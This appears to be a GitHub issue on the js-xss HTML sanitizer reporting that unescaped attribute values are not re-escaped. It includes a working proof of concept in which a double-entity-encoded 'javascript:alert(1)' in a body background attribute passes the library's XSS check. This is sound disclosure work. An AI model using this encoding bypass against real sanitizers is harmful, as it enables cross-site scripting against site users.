search

leizongmin / js-xss

Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist
http://jsxss.com
Other
5.2k stars 629 forks source link

Lack of re-escaping the original attribute value(bypassing the check for XSS in background/style) #180

Open potetisensei opened 4 years ago

potetisensei commented 4 years ago

In safeAttrValue, we can see that friendlyAttrValue unescapes the attribute value. https://github.com/leizongmin/js-xss/blob/master/lib/default.js#L149

In the end of this function, however, the unescaped value is not "re-escaped", which results in the bypass of the check for XSS in background or style attributes.

Here is the PoC:

var xss = require("xss");
var html = "<body background=&#38;&#35;&#49;&#48;&#54;&#59;&#38;&#35;&#57;&#55;&#59;&#38;&#35;&#49;&#49;&#56;&#59;&#38;&#35;&#57;&#55;&#59;&#38;&#35;&#49;&#49;&#53;&#59;&#38;&#35;&#57;&#57;&#59;&#38;&#35;&#49;&#49;&#52;&#59;&#38;&#35;&#49;&#48;&#53;&#59;&#38;&#35;&#49;&#49;&#50;&#59;&#38;&#35;&#49;&#49;&#54;&#59;&#38;&#35;&#53;&#56;&#59;&#38;&#35;&#57;&#55;&#59;&#38;&#35;&#49;&#48;&#56;&#59;&#38;&#35;&#49;&#48;&#49;&#59;&#38;&#35;&#49;&#49;&#52;&#59;&#38;&#35;&#49;&#49;&#54;&#59;&#38;&#35;&#52;&#48;&#59;&#38;&#35;&#52;&#57;&#59;&#38;&#35;&#52;&#49;&#59;></body>"

options = {}
options.whiteList = {
 "body": ["background"]
}
var html = xss(html, options);
console.log(html);

The above code emits the following html code: <body background="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;"></body>

Since we should no longer care about Internet Explorer, this is not a big problem I think.